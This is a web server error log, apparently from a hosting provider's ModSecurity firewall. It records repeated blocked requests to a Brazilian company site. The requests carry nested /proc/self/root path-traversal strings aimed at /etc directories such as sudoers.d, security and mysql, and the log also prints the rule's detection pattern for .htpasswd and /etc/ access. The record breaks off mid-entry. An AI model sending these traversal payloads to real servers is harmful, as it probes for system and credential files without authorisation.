[Mon Mar 16 12:39:10.115949 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.243.203:47524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkHhXjF1vJNtV6CWr1FQAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:12.303324 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:46108] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkH3jZBu2q05ozVU9XSAAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:14.647502 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:46118] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkIrABkC4fWIHEf8HpswAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:16.571807 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:53534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkJBXjF1vJNtV6CWr1HQAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 12:39:19.973249 2026] [:error] [pid 21946:tid 140411632822016] [client 74.7.241.46:53546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkJ3bQATo66fKoS7xOawAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:39:24.221523 2026] [:error] [pid 10709:tid 140411574073088] [client 74.7.243.203:46130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkLBXjF1vJNtV6CWr1JgAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:26.612801 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:34618] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkLpqj1wV0Si-OkeftbwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:29.979791 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:34626] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkMZqj1wV0Si-OkefteAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:32.332517 2026] [:error] [pid 11972:tid 140411708356352] [client 74.7.243.203:44088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkNJqj1wV0Si-OkeftfAAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:37.188354 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:44100] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkOZqj1wV0Si-OkeftiAAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:46.070098 2026] [:error] [pid 21946:tid 140411649607424] [client 74.7.243.203:44116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkQnbQATo66fKoS7xOdQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:49.412769 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:34218] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkRbABkC4fWIHEf8HptwAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:51.844447 2026] [:error] [pid 10709:tid 140411649607424] [client 74.7.243.203:59448] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkRxXjF1vJNtV6CWr1KgAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:39:53.183412 2026] [:error] [pid 21946:tid 140411574073088] [client 74.7.243.203:59452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkSXbQATo66fKoS7xOdwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:04.965024 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:59466] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkVHjZBu2q05ozVU9XWAAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:11.585491 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:55932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkW9SswJuvopo3lOheAwAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:19.291705 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:43784] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkYxXjF1vJNtV6CWr1MwAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:26.123371 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:60802] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkao6lpbStxTqkSktrtQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:30.766495 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.243.203:60816] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkbtSswJuvopo3lOheCAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:37.760655 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:44400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkdRXjF1vJNtV6CWr1PgAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:39.126960 2026] [:error] [pid 21946:tid 140411691570944] [client 74.7.243.203:44410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgkd3bQATo66fKoS7xOhgAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 12:40:43.751617 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:39796] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id 